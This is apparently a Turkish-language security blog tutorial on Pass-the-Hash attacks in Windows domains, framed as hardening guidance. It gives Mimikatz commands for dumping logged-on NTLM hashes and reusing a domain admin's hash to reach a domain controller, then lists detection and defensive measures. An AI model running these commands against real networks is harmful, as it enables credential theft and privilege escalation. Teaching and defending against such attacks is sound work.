Bu makale, kullanmakta olduğunuz sistemleri (Server/Client) güncel tutmanız ve security hardening yapmanız için yayınlanmıştır. Sistemleriniz de güvenlik açığı olduğu zaman aşağıdaki işlemler yapılabilmektedir.

Bu bilgileri yasa dışı bir faaliyet amacıyla kullanmayınız.

Pass to Hash (PTH) Windows Server veya istemcilerinde şifreler hash olarak tutulmaktadır. Kötü niyetli kişiler RAM üzerinden ilgili hash bilgilerini çalarak hedef sisteme erişmek için kullanırlar. Bu atak türüne PTH atağı denilmektedir. Bu atağın amacı domain içerisinde yayılmak ve Privilege Escalation yaparak hak yükseltmektir.

Bu makalede bu tür işlemlerin nasıl gerçekleştirileceğini göreceğimiz gibi, makalenin sonunda bu tür işlemlerden kendinizi korumanız için nasıl önlemler almanız gerektiğiyle ilgili bilgilerde yer almaktadır.

Aşağıdaki komutlar kullanılarak yetkili bir hesabın hash’ini görüntülüyoruz. Mimikatz Tool’u kullanılarak Pass to hash aşağıdaki gibi yapılır.

Mimikatz

Privilege::debug

Sekurlsa::logonpasswords

Burak NTLM Hash: aa6fcf78ec569e0e8b77d1642979775f

Şimdi Burak kullanıcısının Hash bilgisini kullanarak pass to hash yapacağız.

Komut:

Mimikatz.exe “privilege::debug” “sekurlsa::pth /user:burak /ntlm:aa6fcf78ec569e0e8b77d1642979775f /domain:volsys.com” “exit”

Whoami komutunu kulanıdığımızda kullanıcı olarak Recep görülmektedir. Ancak Domain admin haklarına sahip olan Burak kullanıcısının hash’I kullanılmıştır.

Standart user olan Recep oturumunda pass to hash yapılan Burak user’ı ile açılan session’da DC’nin C disk’i sorgulanıyor.

Mimikatz kullanılmadan standard bir cmd’den Recep user’ı ile DC’nin C diski sorgulandığında “Access is denied” hatası alınmaktadır.

Eğer domain’ininiz de ATA var ise böyle bir atak için “Unusual protocol implementation” alert’i oluşturmaktadır.

1. ATA yada Azure ATP kullanınız.
2. PAW (high secure workstation) kullanınız.
3. Anti virüs + EDR + Malware Detection kullanınız.
4. Aduit Log’ların doğru konfigüre edildiğinden ve aktif olduğundan emin olunuz.